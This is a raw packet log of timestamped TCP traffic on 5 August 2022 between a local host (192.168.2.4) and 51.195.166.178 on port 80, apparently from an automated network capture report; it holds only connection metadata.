Aug 5, 2022 13:54:15.644599915 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.644624949 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.644625902 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.644649029 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.644654036 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.644674063 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.644680023 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.644695044 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.644706011 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.644721031 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.644733906 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.644747019 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.644759893 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.644772053 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.644784927 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.644810915 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.644818068 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.644839048 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.644845009 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.644867897 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.644872904 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.644895077 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.644901037 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.644922972 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.644927979 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.644948959 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.644975901 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.674124956 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.674169064 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.674187899 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.674211979 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.674212933 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.674253941 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.674253941 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.674294949 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.674295902 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.674336910 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.674340010 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.674376965 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.674380064 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.674420118 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.674422979 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.674458027 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.674462080 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.674499035 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.674503088 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.674541950 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.674542904 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.674586058 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.674618006 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.674626112 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.674638987 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.674669027 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.674680948 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.674712896 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.674724102 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.674756050 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.674766064 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.674797058 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.674830914 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.674839973 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.674877882 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.674885035 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.674904108 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.674923897 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.674945116 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.674959898 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.674987078 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.674988031 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.675028086 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.675035000 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.675071001 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.675101995 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.675112963 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.675153971 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.675163031 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.675167084 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.675194979 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.675204039 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.675239086 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.675240993 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.675276995 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.675280094 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.675321102 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.675321102 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.675364017 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.675390959 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.675430059 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.675431967 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.675467014 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.675472021 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.675510883 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.675512075 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.675551891 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.675568104 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.675594091 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.675596952 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.675637960 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.675648928 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.675688028 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.675693035 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.675726891 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.675729036 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.675766945 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.675775051 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.675812960 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.675813913 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.675853014 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.675856113 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.675905943 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.675909042 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.675944090 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.675976992 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.676018000 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.676044941 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.676059961 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.676101923 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.676126003 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.676141024 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.676152945 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.676181078 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.676181078 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.676217079 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.676219940 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.676255941 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.676263094 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.676301956 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.676306963 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.676342964 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.676346064 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.676382065 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.676388025 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.676424980 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.676428080 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.676465034 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.676465988 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.676506042 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.676506996 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.676546097 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.676548958 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.676587105 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.676590919 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.676630020 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.676634073 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.676671028 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.676675081 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.676709890 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.676714897 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.676757097 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.676795006 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.676796913 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.676836967 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.676845074 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.676873922 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.676877975 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.676917076 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.676918983 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.676954985 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.676960945 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.676995993 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.676999092 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.677038908 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.677040100 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.677074909 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.677079916 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.677119017 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.677119017 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.677156925 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.677160978 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.677197933 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.677201033 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.677239895 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.677242041 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.677279949 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.677284956 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.677321911 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.677324057 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.677361012 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.677366018 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.677402020 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.677406073 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.677447081 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.677450895 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.677488089 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.677493095 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.677532911 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.677535057 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.677557945 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.677589893 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.677598000 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.677624941 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.677637100 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.677656889 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.677676916 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.677685022 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.677726030 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.677767038 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.677767038 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.677807093 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.677808046 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.677845955 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.677845955 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.677882910 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.677887917 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.677930117 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.677930117 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.677968979 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.677969933 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.678009987 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:15.707283974 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:15.707576990 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:17.446722031 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:17.499272108 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:17.499315977 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:17.499371052 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:17.499403954 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:17.499424934 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:17.499439001 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:17.499470949 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:17.499495029 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:17.499495983 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:17.499519110 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:17.499531031 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:17.499557018 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:17.499562025 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:17.499583006 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:17.499594927 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:17.499622107 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:17.499644995 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:17.528819084 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:17.528878927 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:17.528923988 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:17.528965950 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:17.529006004 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:17.529016018 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:17.529048920 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:17.529089928 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:17.529100895 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:17.529130936 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:17.529159069 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:17.529174089 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:17.529200077 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:17.529215097 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:17.529256105 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:17.529261112 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:17.529299021 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:17.529301882 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:17.529340029 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:17.529380083 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:17.529386997 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:17.529422045 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:17.529426098 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:17.529460907 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:17.529469967 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:17.529505014 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:17.529526949 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:17.529546022 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:17.529582024 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:17.529587030 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:17.529619932 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:17.529629946 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:17.529659033 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:17.529701948 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:17.558835983 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:17.558893919 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:17.558937073 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:17.558952093 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:17.558980942 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:17.559015036 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:17.559025049 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:17.559075117 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:17.559103012 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:17.559118986 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:17.559154034 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:17.559175014 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:17.559209108 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:17.559226990 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:17.559263945 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:17.559268951 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:17.559313059 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:17.559340000 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:17.559377909 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:17.559391975 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:17.559436083 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:17.559478045 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:17.559492111 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:17.559524059 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:17.559551001 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:17.559566021 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:17.559604883 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:17.559608936 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:17.559647083 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:17.559652090 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:17.559683084 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:17.559693098 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:17.559724092 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:17.559735060 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:17.559775114 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:17.559813023 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:17.559855938 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:17.559880972 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:17.559899092 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:17.559941053 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:17.559950113 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:17.559983969 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:17.559987068 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:17.560025930 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:17.560050964 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:17.560065985 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:17.560086966 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:17.560107946 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:17.560122013 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:17.560148001 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:17.560159922 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:17.560190916 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:17.560199022 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:17.560240030 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:17.560261011 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:17.560296059 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.749895096 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.802898884 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.802936077 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.802963972 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.802983046 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.803016901 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.803042889 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.803066969 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.803086996 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.803111076 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.803116083 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.803143024 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.803191900 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.803198099 CEST	49778	80	192.168.2.4	51.195.166.178
